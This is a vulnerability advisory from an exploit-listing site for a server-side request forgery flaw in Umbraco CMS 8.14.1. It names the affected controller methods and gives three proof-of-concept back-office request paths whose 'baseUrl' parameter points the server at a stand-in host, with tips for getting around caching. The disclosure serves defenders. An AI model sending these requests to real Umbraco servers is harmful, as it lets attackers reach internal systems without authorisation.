Umbraco 8.14.1 Server-Side Request Forgery

2021.10.29
Credit: NgoAnhDuc
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF # Date: July 5, 2021 # Exploit Author: NgoAnhDuc # Vendor Homepage: https://our.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases/8141 # Version: v8.14.1 # Affect: Umbraco CMS v8.14.1, Umbraco Cloud Vulnerable code: Umbraco.Web.Editors.HelpController.GetContextHelpForPage(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14 Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50 Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss(): https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91 PoC: /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl= https://SSRF-HOST.EXAMPLE/ /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/ Notes: - There's no "/" suffix in payload 1 - "/" suffix is required in payload 2 and payload 3 - "section" parameter value must be changed each exploit attempt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top